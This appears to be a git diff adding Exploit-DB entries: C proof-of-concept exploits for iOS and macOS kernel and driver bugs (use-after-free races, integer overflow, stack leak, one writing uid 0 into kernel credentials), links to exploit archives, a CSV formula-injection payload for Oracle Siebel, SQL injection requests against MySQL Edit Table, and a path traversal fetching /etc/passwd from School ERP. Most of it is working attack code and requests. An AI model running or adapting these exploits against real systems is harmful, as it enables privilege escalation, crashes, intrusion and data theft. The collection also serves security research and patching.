diff --git a/exploits/ios/dos/45649.txt b/exploits/ios/dos/45649.txt new file mode 100644 index 000000000..1124c43c3 --- /dev/null +++ b/exploits/ios/dos/45649.txt @@ -0,0 +1,58 @@ +Here's a code snippet from sleh.c with the second level exception handler for undefined instruction exceptions: + + static void + handle_uncategorized(arm_saved_state_t *state, boolean_t instrLen2) + { + exception_type_t exception = EXC_BAD_INSTRUCTION; + mach_exception_data_type_t codes[2] = {EXC_ARM_UNDEFINED}; + mach_msg_type_number_t numcodes = 2; + uint32_t instr; <------ (a) + + if (instrLen2) { + uint16_t instr16; + COPYIN(get_saved_state_pc(state), (char *)&instr16, sizeof(instr16)); + + instr = instr16; + } else { + COPYIN(get_saved_state_pc(state), (char *)&instr, sizeof(instr)); <------- (b) + } + + .... + + else { + codes[1] = instr; <------ (c) + } + } + + exception_triage(exception, codes, numcodes); <-------- (d) + + + At (a) the uint32_t instr is declared uninitialized on the stack. + At (b) the code tries to copyin the bytes of the exception-causing instruction from userspace + note that the COPYIN macro doesn't itself check the return value of copyin, it just calls it. + At (c) instr is assigned to codes[1], which at (d) is passed to exception_triage. + + that codes array will eventually end up being sent in an exception mach message. + + The bug is that we can force copyin to fail by unmapping the page containing the undefined instruction + while it's being handled. (I tried to do this with XO memory but the kernel seems to be able to copyin that just fine.) + + This PoC has an undefined instruction (0xdeadbeef) on its own page and spins up a thread to keep + switching the protection of that page between VM_PROT_NONE and VM_PROT_READ|VM_PROT_EXECUTE. + + We then keep spinning up threads which try to execute that undefined instruction. + + If the race windows align the thread executes the undefined instruction but when the sleh code tries to copyin + the page is unmapped, the copying fails and the exception message we get has stale stack memory. + + This PoC just demonstrates that you do get values which aren't 0xdeadbeef in there for the EXC_ARM_UNDEFINED type. + You'd have to do a bit more fiddling to work out how to get something specific there. + + Note that there are lots of other unchecked COPYIN's in sleh.c (eg when userspace tries to access a system register not allowed + for EL0) and these seem to have the same issue. + + tested on iPod Touch 6g running 11.3.1, but looking at the kernelcache it seems to still be there in iOS 12. + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45649.zip \ No newline at end of file diff --git a/exploits/ios/dos/45652.c b/exploits/ios/dos/45652.c new file mode 100644 index 000000000..8ea6c3e91 --- /dev/null +++ b/exploits/ios/dos/45652.c @@ -0,0 +1,171 @@ +/* +There was recently some cleanup in the persona code to fix some race conditions there, I don't think it was sufficient: + + In kpersona_alloc_syscall if we provide an invalid userspace pointer for the ipd outptr we can cause this copyout to fail: + + error = copyout(&persona->pna_id, idp, sizeof(persona->pna_id)); + if (error) + goto out_error; + +This jumps here: + if (persona) + persona_put(persona); + +At this point the persona is actually in the global list and the reference has been transfered there; this code +is mistakenly assuming that userspace can't still race a dealloc call because it doesn't know the id. + +The id is attacker controlled so it's easy to still race this (ie we call persona_alloc in one thread, and dealloc in another), +causing an extra call to persona_put. + +It's probably possible to make the failing copyout take a long time, +allowing us to gc and zone-swap the page leading to the code attempting to drop a ref on a different type. + +This PoC has been tested on iOS 11.3.1 because it requires root. I have taken a look at an iOS 12 beta and it looks like the vuln +is still there, but I cannot test it. + +It should be easy to fix up this PoC to run as root in your testing environment. +*/ + +// @i41nbeer + +#include "test_next_exploit.h" +#include +#include +#include + +#include "kmem.h" + + +/* +iOS kernel UaF due to bad error handling in personas + +There was recently some cleanup in the persona code to fix some race conditions there, I don't think it was sufficient: + + In kpersona_alloc_syscall if we provide an invalid userspace pointer for the ipd outptr we can cause this copyout to fail: + + error = copyout(&persona->pna_id, idp, sizeof(persona->pna_id)); + if (error) + goto out_error; + +This jumps here: + if (persona) + persona_put(persona); + +At this point the persona is actually in the global list and the reference has been transfered there; this code +is mistakenly assuming that userspace can't still race a dealloc call because it doesn't know the id. + +The id is attacker controlled so it's easy to still race this (ie we call persona_alloc in one thread, and dealloc in another), +causing an extra call to persona_put. + +It's probably possible to make the failing copyout take a long time, +allowing us to gc and zone-swap the page leading to the code attempting to drop a ref on a different type. + +This PoC has been tested on iOS 11.3.1 because it requires root. I have taken a look at an iOS 12 beta and it looks like the vuln +is still there, but I cannot test it. + +It should be easy to fix up this PoC to run as root in your testing environment. +*/ + + + +#define NGROUPS 16 +#define MAXLOGNAME 255 + +struct kpersona_info { + uint32_t persona_info_version; + + uid_t persona_id; /* overlaps with UID */ + int persona_type; + gid_t persona_gid; + uint32_t persona_ngroups; + gid_t persona_groups[NGROUPS]; + uid_t persona_gmuid; + char persona_name[MAXLOGNAME+1]; + + /* TODO: MAC policies?! */ +}; + +enum { + PERSONA_INVALID = 0, + PERSONA_GUEST = 1, + PERSONA_MANAGED = 2, + PERSONA_PRIV = 3, + PERSONA_SYSTEM = 4, + + PERSONA_TYPE_MAX = PERSONA_SYSTEM, +}; + +#define PERSONA_OP_ALLOC 1 +#define PERSONA_OP_DEALLOC 2 +#define PERSONA_OP_GET 3 +#define PERSONA_OP_INFO 4 +#define PERSONA_OP_PIDINFO 5 +#define PERSONA_OP_FIND 6 + +#define PERSONA_INFO_V1 1 + +#define PERSONA_SYSCALL_NUMBER 494 +int sys_persona(uint32_t operation, uint32_t flags, struct kpersona_info *info, uid_t *id, size_t *idlen) { + return syscall(PERSONA_SYSCALL_NUMBER, operation, flags, info, id, idlen); +} + +void persona_dealloc() { + uid_t uid = 235; + size_t uid_size = sizeof(uid); + int perr = sys_persona(PERSONA_OP_DEALLOC, 0, NULL, &uid, &uid_size); + printf("dealloc perr: 0x%x\n", perr); +} + +void* persona_bad_alloc() { + // let's try to alloc a persona: + struct kpersona_info info = {0}; + uid_t kpersona_uid = -123; + size_t kpersona_uid_size = sizeof(kpersona_uid); + + info.persona_info_version = PERSONA_INFO_V1; + strcpy(info.persona_name, "a_name2"); + + info.persona_id = 235; + info.persona_type = PERSONA_GUEST; + + int perr = sys_persona(PERSONA_OP_ALLOC, 0, &info, NULL/*&kpersona_uid*/, &kpersona_uid_size); + printf("err: %x\n", perr); + printf("kpersona_uid: %d\n", kpersona_uid); + + return NULL; +} + +void* dealloc_thread_func(void* arg) { + int uid = getuid(); + printf("dealloc thread uid: %d\n", uid); + // got r00t? + while(1) { + persona_dealloc(); + } +} + +void* alloc_thread_func(void* arg) { + int uid = getuid(); + printf("alloc_thread uid: %d\n", uid); + // got r00t? + while(1) { + persona_bad_alloc(); + } +} + +void go(uint64_t thread_t) { + uint64_t bsd_thread_info = rk64(thread_t + 0x388); + uint64_t cred_t = rk64(bsd_thread_info + 0x160); + + // uid:=0 + wk32(cred_t+0x18, 0); + wk32(cred_t+0x1c, 0); + + pthread_t dealloc_thread; + pthread_create(&dealloc_thread, NULL, dealloc_thread_func, NULL); + + pthread_t alloc_thread; + pthread_create(&alloc_thread, NULL, alloc_thread_func, NULL); + + pthread_join(dealloc_thread, NULL); +} \ No newline at end of file diff --git a/exploits/java/webapps/45643.txt b/exploits/java/webapps/45643.txt new file mode 100644 index 000000000..093821775 --- /dev/null +++ b/exploits/java/webapps/45643.txt @@ -0,0 +1,42 @@ +# Exploit Title: Oracle Siebel CRM 8.1.1 - CSV Injection +# Date: 2018-10-21 +# Exploit Author: Sarath Nair aka AceNeon13 +# Contact: @AceNeon13 +# Vendor Homepage: www.oracle.com +# Software Link: http://www.oracle.com/us/products/applications/siebel/siebel-crm-8-1-1-066196.html +# Version: Oracle Siebel CRM Version 8.1.1 and below + +# PoC Exploit: CSV Injection +# Vulnerable URL: All CSV Export functionalities within the CRM application +# Description: Siebel CRM application was found to be vulnerable to Excel Macro injection vulnerability, +# in places where user input is allowed (in text form) and the input can then be exported in CSV +# form. An attacker can change user information to include in his input a malicious excel function. + +=-2+3+cmd|' /C calc'!D + +# The function will then be executed on the victim’s machine, +# once the victim exports the details in CSV format and opens the exported file in Microsoft Excel. + +# Impact: The vulnerability doesn’t target the web application but rather its users. +# A hypothetical attacker could use it, in order to trick other application users into unwillingly +# executing arbitrary malicious code, potentially leading to full a compromise of their workstation. +# Although excel has implemented certain features to protect its users +# (the user is asked whether he wants to execute a potentially harmful external script), +# the user could easily assume that the content can be trusted since the file is +# extracted from a trusted source. + +# Solution: Disable CSV export in all list applets and where CSV export is available. +# https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html#c_Patch_Management_ai1029938a + +######################################## +# Vulnerability Disclosure Timeline: + +2017-November-20: Discovered vulnerability +2017-November-23: Vendor Notification +2017-November-29: Vendor Response/Feedback +2018-October-04: Vendor Fix/Patch/Workaround +2018-October-21: Public Disclosure +######################################## + +Warm regards, +Sarath Nair \ No newline at end of file diff --git a/exploits/macos/dos/45647.c b/exploits/macos/dos/45647.c new file mode 100644 index 000000000..ce1abae01 --- /dev/null +++ b/exploits/macos/dos/45647.c @@ -0,0 +1,245 @@ +/* +This PoC file might look familiar; this bug is a trivial variant of CVE-2016-1744 (Apple bug id 635599405.) + +That report showed the bug in the unmap_user_memory external methods; a variant also exists +in the map_user_memory external methods. + +The intel graphics drivers have their own hash table type IGHashTable which isn't thread-safe. + +map_user_memory manipulates an IGHashTable without locking leading to memory issues (eg UaFs and/or double-frees) + +tested on MacOS 10.13.5 (17F77) on MacBookPro10,1 +*/ + +//ianbeer + +// build: clang -o ig_gl_unmap_racer ig_gl_unmap_racer.c -framework IOKit + +#if 0 +UaF/Double-delete due to bad locking in Apple Intel GPU driver + +This PoC file might look familiar; this bug is a trivial variant of CVE-2016-1744 (Apple bug id 635599405.) + +That report showed the bug in the unmap_user_memory external methods; a variant also exists +in the map_user_memory external methods. + +The intel graphics drivers have their own hash table type IGHashTable which isn't thread-safe. + +map_user_memory manipulates an IGHashTable without locking leading to memory issues (eg UaFs and/or double-frees) + +tested on MacOS 10.13.5 (17F77) on MacBookPro10,1 + +#endif + +#include +#include +#include +#include +#include + +#include +#include + +#include + +#include + +#include + +#include + + +struct mem_desc { + uint64_t ptr; + uint64_t size; +}; + +uint64_t map_user_memory(mach_port_t conn) { + kern_return_t err; + void* mem = malloc(0x20000); + // make sure that the address we pass is page-aligned: + mem = (void*) ((((uint64_t)mem)+0x1000)&~0xfff); + printf("trying to map user pointer: %p\n", mem); + + uint64_t inputScalar[16] = {0}; + uint64_t inputScalarCnt = 0; + + char inputStruct[4096] = {0}; + size_t inputStructCnt = 0; + + uint64_t outputScalar[16] = {0}; + uint32_t outputScalarCnt = 0; + + char outputStruct[4096] = {0}; + size_t outputStructCnt = 0; + + inputScalarCnt = 0; + inputStructCnt = 0x10; + + outputScalarCnt = 4096; + outputStructCnt = 16; + + struct mem_desc* md = (struct mem_desc*)inputStruct; + md->ptr = (uint64_t)mem; + md->size = 0x1000; + + err = IOConnectCallMethod( + conn, + 0x200, // IGAccelGLContext::map_user_memory + inputScalar, + inputScalarCnt, + inputStruct, + inputStructCnt, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err != KERN_SUCCESS){ + printf("IOConnectCall error: %x\n", err); + //return 0; + } else{ + printf("worked? outputScalarCnt = %d\n", outputScalarCnt); + } + + printf("outputScalarCnt = %d\n", outputScalarCnt); + + md = (struct mem_desc*)outputStruct; + printf("0x%llx :: 0x%llx\n", md->ptr, md->size); + + return (uint64_t)mem; +} + +uint64_t unmap_user_memory(mach_port_t conn, uint64_t handle) { + kern_return_t err; + + uint64_t inputScalar[16]; + uint64_t inputScalarCnt = 0; + + char inputStruct[4096]; + size_t inputStructCnt = 0; + + uint64_t outputScalar[16]; + uint32_t outputScalarCnt = 0; + + char outputStruct[4096]; + size_t outputStructCnt = 0; + + inputScalarCnt = 0; + inputStructCnt = 0x8; + + outputScalarCnt = 4096; + outputStructCnt = 16; + + *((uint64_t*)inputStruct) = handle; + + err = IOConnectCallMethod( + conn, + 0x201, // IGAccelGLContext::unmap_user_memory + inputScalar, + inputScalarCnt, + inputStruct, + inputStructCnt, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err != KERN_SUCCESS){ + printf("IOConnectCall error: %x\n", err); + } else{ + printf("worked?\n"); + } + + return 0; +} + +mach_port_t get_user_client(char* name, int type) { + kern_return_t err; + + CFMutableDictionaryRef matching = IOServiceMatching(name); + if(!matching){ + printf("unable to create service matching dictionary\n"); + return 0; + } + + io_iterator_t iterator; + err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator); + if (err != KERN_SUCCESS){ + printf("no matches\n"); + return 0; + } + + io_service_t service = IOIteratorNext(iterator); + + if (service == IO_OBJECT_NULL){ + printf("unable to find service\n"); + return 0; + } + printf("got service: %x\n", service); + + + io_connect_t conn = MACH_PORT_NULL; + err = IOServiceOpen(service, mach_task_self(), type, &conn); + if (err != KERN_SUCCESS){ + printf("unable to get user client connection\n"); + return 0; + } + + printf("got userclient connection: %x\n", conn); + + return conn; +} + +volatile mach_port_t gl_context = MACH_PORT_NULL; + +#define N_HANDLES 40 +void go(void* arg){ + while (1) { + uint64_t handles[N_HANDLES] = {0}; + for (int i = 0; i < N_HANDLES; i++) { + handles[i] = map_user_memory(gl_context); + } + + for (int i = 0; i < N_HANDLES; i++) { + unmap_user_memory(gl_context, handles[i]); + } + } +} + + + + + +int main(int argc, char** argv){ + // get an IGAccelGLContext + gl_context = get_user_client("IntelAccelerator", 1); + printf("gl_context: %x\n", gl_context); + + // get a IGAccelSharedUserClient + mach_port_t shared = get_user_client("IntelAccelerator", 6); + printf("shared: %x\n", shared); + + // connect the gl_context to the shared UC so we can actually use it: + kern_return_t err = IOConnectAddClient(gl_context, shared); + if (err != KERN_SUCCESS){ + printf("IOConnectAddClient error: %x\n", err); + return 0; + } + + printf("added client to the shared UC\n"); + +#define N_THREADS 2 + pthread_t threads[N_THREADS]; + + for (int i = 0; i < N_THREADS; i++) { + pthread_create(&threads[i], NULL, go, NULL); + } + + pthread_join(threads[0], NULL); + + + return 0; + + +} \ No newline at end of file diff --git a/exploits/multiple/dos/45648.txt b/exploits/multiple/dos/45648.txt new file mode 100644 index 000000000..24e970324 --- /dev/null +++ b/exploits/multiple/dos/45648.txt @@ -0,0 +1,36 @@ +io_hideventsystem is a MIG service which provides proxy access to various HID devices for untrusted +clients. On iOS it's hosted by backboardd and on MacOS by hidd. The actual implementation is +in IOKit.framework. + +I, and also pangu jailbreak team, had previously found a few bugs in the kernel IODataQueue code. +It seems that io_hideventsystem also uses IODataQueues purely in userspace. That is, via shared +memory between two userspace processes rather than between a userspace process and the kernel. + +It turns out that the userspace code for enqueuing and dequeuing from an IODataQueue has none +of the hardening that the kernel code now has, so it's trivial to just replace the length, head +and tail fields (which are in a header at the start of the shared memory buffer) such that +the remote process tries to enqueue outside of the bounds of the IODataQueue's actual backing +buffer. + +This is a very basic PoC thrown together to minimally repro the issue. + +Run build.sh and run.sh, use the mouse a bit and notice the hidd crash log. Don't try to attach lldb to hidd, you will +struggle to interact with it! + +Specifically the server will allocate a buffer wrapped by a mach port (via mach_make_memory_entry_64) +then in the client you can see inside IOHIDEventQueueCreateWithVM the port's memory being mapped. + +The attached dylib just interposes mach_vm_map to replace the size and tail fields once the shared +memory is mapped in the client. + +I've also tested this on iOS just manually manipulating the shared memory after it's mapped. + +Depending on how clients use io_hideventsystem it might be possible to hop first in to backboardd +then in to another client (if that client is also enqueuing events into a queue) but that will +take some more research. + +Tested on MacOS 10.13.6 and iOS 11.3.1 (that's the highest version I have on a device with me right now.) + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45648.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45650.txt b/exploits/multiple/dos/45650.txt new file mode 100644 index 000000000..af3c484dc --- /dev/null +++ b/exploits/multiple/dos/45650.txt @@ -0,0 +1,16 @@ +io_hideventsystem sets up a shared memory event queue; at the end of this shared memory buffer it puts +a mach message which it sends whenever it wants to notify a client that there's data available +in the queue. + +As a client we can modify this mach message such that the server (hidd on MacOS, backboardd on iOS) +will send us an arbitrary mach port from its namespace with an arbitrary disposition. + +This is a minimal PoC to demonstrate the issue. Interpose it in to the PoC for P0 1623, Apple issue 695930632 + +Attaching two PoCS: +deja-xnu: exploit for this issue on iOS 11.4.1 to get code execution as backboardd, and then trigger p0 issue 1658 +dq8: exploit for this issue, and a new exploit for the original pangu variant of this issue to get a real tfp0 on iOS 7.1.2 + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45650.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45651.c b/exploits/multiple/dos/45651.c new file mode 100644 index 000000000..fcca6b911 --- /dev/null +++ b/exploits/multiple/dos/45651.c @@ -0,0 +1,230 @@ +/* +IOHIDResourceQueue inherits from IOSharedDataQueue and adds its own ::enqueueReport method, +which seems to be mostly copy-pasted from IOSharedDataQueue and IODataQueue's ::enqueue methods. + +I reported a bunch of integer overflows in IODataQueue over four years ago (CVE-2014-4389, apple issue 607452866) + +IOHIDResourceQueue::enqueueReport has basically the same bug: + +Boolean IOHIDResourceQueue::enqueueReport(IOHIDResourceDataQueueHeader * header, IOMemoryDescriptor * report) +{ + UInt32 headerSize = sizeof(IOHIDResourceDataQueueHeader); + UInt32 reportSize = report ? (UInt32)report->getLength() : 0; + UInt32 dataSize = ALIGNED_DATA_SIZE(headerSize + reportSize, sizeof(uint32_t)); <--- (a) + UInt32 head; + UInt32 tail; + UInt32 newTail; + const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE; + IODataQueueEntry * entry; + + // Force a single read of head and tail + head = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->head, __ATOMIC_RELAXED); + tail = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->tail, __ATOMIC_RELAXED); + + if ( tail > getQueueSize() || head > getQueueSize() || dataSize < headerSize || entrySize < dataSize) <--- (b) + { + return false; + } + + if ( tail >= head ) + { + // Is there enough room at the end for the entry? + if ((getQueueSize() - tail) >= entrySize ) + { + entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail); + + entry->size = dataSize; + + bcopy(header, &entry->data, headerSize); + + if ( report ) + report->readBytes(0, ((UInt8*)&entry->data) + headerSize, reportSize); <--- (c) + + + + +Report is the IOMemoryDescriptor which wraps the stucture input to the io_connect_call, it's wrapping a portion +of userspace so we can actually make an IOMemoryDescriptor with a length of 0xffffffff. This will overflow at (a) +giving us a small value for dataSize. This will pass the checks at (b) but then the reportSize value is used at (c) +for the actually memory write operation. + +The IOHIDResource is used when userspace wants to implement an HID device; to exploit this you need there to actually be one +of these devices. If you have the com.apple.hid.manager.user-access-device entitlement you can create one of these. + +A bunch of daemons do possess this entitlement, for example bluetoothd needs it to implement bluetooth HID keyboards, +so if you have a bluetooth keyboard connected you can trigger this bug without needing com.apple.hid.manager.user-access-device.) + +You can test this PoC either by connecting a bluetooth HID device, or by building the IOHIDResource keyboard example +from the IOHIDFamily code, giving it the correct entitlement and running it. +*/ + +// @i41nbeer + +/* +iOS/MacOS kernel memory corruption due to integer overflow in IOHIDResourceQueue::enqueueReport + +IOHIDResourceQueue inherits from IOSharedDataQueue and adds its own ::enqueueReport method, +which seems to be mostly copy-pasted from IOSharedDataQueue and IODataQueue's ::enqueue methods. + +I reported a bunch of integer overflows in IODataQueue over four years ago (CVE-2014-4389, apple issue 607452866) + +IOHIDResourceQueue::enqueueReport has basically the same bug: + +Boolean IOHIDResourceQueue::enqueueReport(IOHIDResourceDataQueueHeader * header, IOMemoryDescriptor * report) +{ + UInt32 headerSize = sizeof(IOHIDResourceDataQueueHeader); + UInt32 reportSize = report ? (UInt32)report->getLength() : 0; + UInt32 dataSize = ALIGNED_DATA_SIZE(headerSize + reportSize, sizeof(uint32_t)); <--- (a) + UInt32 head; + UInt32 tail; + UInt32 newTail; + const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE; + IODataQueueEntry * entry; + + // Force a single read of head and tail + head = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->head, __ATOMIC_RELAXED); + tail = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->tail, __ATOMIC_RELAXED); + + if ( tail > getQueueSize() || head > getQueueSize() || dataSize < headerSize || entrySize < dataSize) <--- (b) + { + return false; + } + + if ( tail >= head ) + { + // Is there enough room at the end for the entry? + if ((getQueueSize() - tail) >= entrySize ) + { + entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail); + + entry->size = dataSize; + + bcopy(header, &entry->data, headerSize); + + if ( report ) + report->readBytes(0, ((UInt8*)&entry->data) + headerSize, reportSize); <--- (c) + + + + +Report is the IOMemoryDescriptor which wraps the stucture input to the io_connect_call, it's wrapping a portion +of userspace so we can actually make an IOMemoryDescriptor with a length of 0xffffffff. This will overflow at (a) +giving us a small value for dataSize. This will pass the checks at (b) but then the reportSize value is used at (c) +for the actually memory write operation. + +The IOHIDResource is used when userspace wants to implement an HID device; to exploit this you need there to actually be one +of these devices. If you have the com.apple.hid.manager.user-access-device entitlement you can create one of these. + +A bunch of daemons do possess this entitlement, for example bluetoothd needs it to implement bluetooth HID keyboards, +so if you have a bluetooth keyboard connected you can trigger this bug without needing com.apple.hid.manager.user-access-device.) + +You can test this PoC either by connecting a bluetooth HID device, or by building the IOHIDResource keyboard example +from the IOHIDFamily code, giving it the correct entitlement and running it. + +Tested on MacOS 10.13.6 (17G65) +*/ + +#include +#include +#include +#include + +#include + +#include +#include + +int main(int argc, char** argv){ + printf("pid: %d\n", getpid()); + kern_return_t err; + + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOHIDUserDevice")); + + if (service == IO_OBJECT_NULL){ + printf("unable to find service\n"); + return 0; + } + + io_connect_t conn = MACH_PORT_NULL; + err = IOServiceOpen(service, mach_task_self(), 0, &conn); + if (err != KERN_SUCCESS){ + printf("unable to get user client connection\n"); + return 0; + } + + printf("got client\n"); + + uint64_t inputScalar[16]; + uint64_t inputScalarCnt = 0; + + char inputStruct[4096]; + size_t inputStructCnt = 0; + + uint64_t outputScalar[16]; + uint32_t outputScalarCnt = 0; + + char outputStruct[4096]; + size_t outputStructCnt = 0; + + // open + + inputScalar[0] = 0; + inputScalarCnt = 1; + + err = IOConnectCallMethod( + conn, + 1, + inputScalar, + inputScalarCnt, + inputStruct, + inputStructCnt, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err != KERN_SUCCESS){ + printf("IOConnectCall error: %x\n", err); + return 0; + } + + printf("called external method open\n"); + + mach_vm_address_t addr = 0x4100000000; + mach_vm_size_t size = 0x1000; + + err = IOConnectMapMemory(conn, 0, mach_task_self(), &addr, &size, 0); + if (err != KERN_SUCCESS){ + printf("IOConnectMapMemory failed:0x%x\n", err); + return 0; + } + + printf("mapped queue memory here: %016llx\n", addr); + + char* buf = malloc(0x100000000); + memset(buf, 'A', 0x100000000); + + inputScalar[0] = 0x0; + inputScalar[1] = 0x0; + inputScalarCnt = 3; + outputScalarCnt = 0; + + err = IOConnectCallMethod( + conn, + 13, // setreport + inputScalar, + inputScalarCnt, + buf, + 0xffffffff, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err != KERN_SUCCESS){ + printf("IOConnectCall error: %x\n", err); + return 0; + } + + return 0; +} \ No newline at end of file diff --git a/exploits/php/webapps/45639.txt b/exploits/php/webapps/45639.txt new file mode 100644 index 000000000..2568da68c --- /dev/null +++ b/exploits/php/webapps/45639.txt @@ -0,0 +1,78 @@ +# Exploit Title: MySQL Edit Table 1.0 - 'id' SQL Injection +# Dork: N/A +# Date: 2018-10-18 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.bookman.nl +# Software Link: https://sourceforge.net/projects/sql-edit-table/files/latest/download +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/example.php?mte_a=edit&id=[SQL] +# function edit_rec() { +# if (isset ($_GET['id'])) $in_id = $_GET['id']; +# if ($_GET['mte_a'] == 'edit') $edit=1; +# else $edit = 0; +# $count_required = 0; +# $rows = ''; +# $result = mysqli_query($this->mysqli,"SHOW COLUMNS FROM `$this->table`"); + +GET /[PATH]/example.php?mte_a=edit&id=-18++UNIon(SEleCT+0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e)--+- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +If-Modified-Since: Thu, 18 Oct 2018 14:31:03 GMT +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 14:34:58 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Mon, 26 Jul 1997 05:00:00 GMT +Cache-Control: private +Pragma: no-cache +Last-Modified: Thu, 18 Oct 2018 14:34:58 GMT +Content-Length: 3642 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/example.php?mte_a=del&id=[SQL] +# +# function del_rec() { +# $in_id = $_GET['id']; +# if (mysqli_query($this->mysqli,"DELETE FROM $this->table WHERE `$this->primary_key` = '$in_id'")) { +# $this->content_deleted = " + +GET /[PATH]/example.php?mte_a=del&id=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%31%31%31%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%31%3d%31%31%31%2c%31%29%29%29%29%29%2d%2d%20%45%66%65 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +If-Modified-Since: Thu, 18 Oct 2018 14:38:14 GMT +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 14:38:18 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Mon, 26 Jul 1997 05:00:00 GMT +Cache-Control: private +Pragma: no-cache +Last-Modified: Thu, 18 Oct 2018 14:38:18 GMT +Content-Length: 1046 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45642.txt b/exploits/php/webapps/45642.txt new file mode 100644 index 000000000..66de62a75 --- /dev/null +++ b/exploits/php/webapps/45642.txt @@ -0,0 +1,64 @@ +# Exploit Title: School ERP Ultimate 2018 - Arbitrary File Download +# Dork: N/A +# Date: 2018-10-21 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://freeschoolerp.com/ +# Software Link: http://freeschoolerp.com/schoolerp_30Nov2017_free.zip +# Software Link: https://sourceforge.net/projects/free-school-management-system/files/latest/download +# Version: 2018 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/student_staff/download.php?document=[FILE] +# http://localhost/[PATH]/office_admin/download.php?document=[FILE] +# +# /[PATH]/student_staff/download.php +# /[PATH]/office_admin/download.php +# .... +# if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") { +# $file = $_REQUEST['document']; +# header("Content-type: application/force-download"); +# header("Content-Transfer-Encoding: Binary"); +# header("Content-length: ".filesize($file)); +# header("Content-disposition: attachment; filename=\"".$file."\""); +# readfile($file); +# exit; +# } +# .... + +GET /[PATH]/student_staff/download.php?document=download.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 21 Oct 2018 00:30:01 GMT +Server: Apache +Content-Transfer-Encoding: Binary +Content-Disposition: attachment; filename="download.php" +Content-Length: 337 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/force-download + +GET /[PATH]/office_admin/download.php?document=../../../../../etc/passwd HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 21 Oct 2018 00:31:34 GMT +Server: Apache +Content-Transfer-Encoding: Binary +Content-Disposition: attachment; filename="../../../../../etc/passwd" +Content-Length: 46368 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/force-download \ No newline at end of file diff --git a/exploits/php/webapps/45645.txt 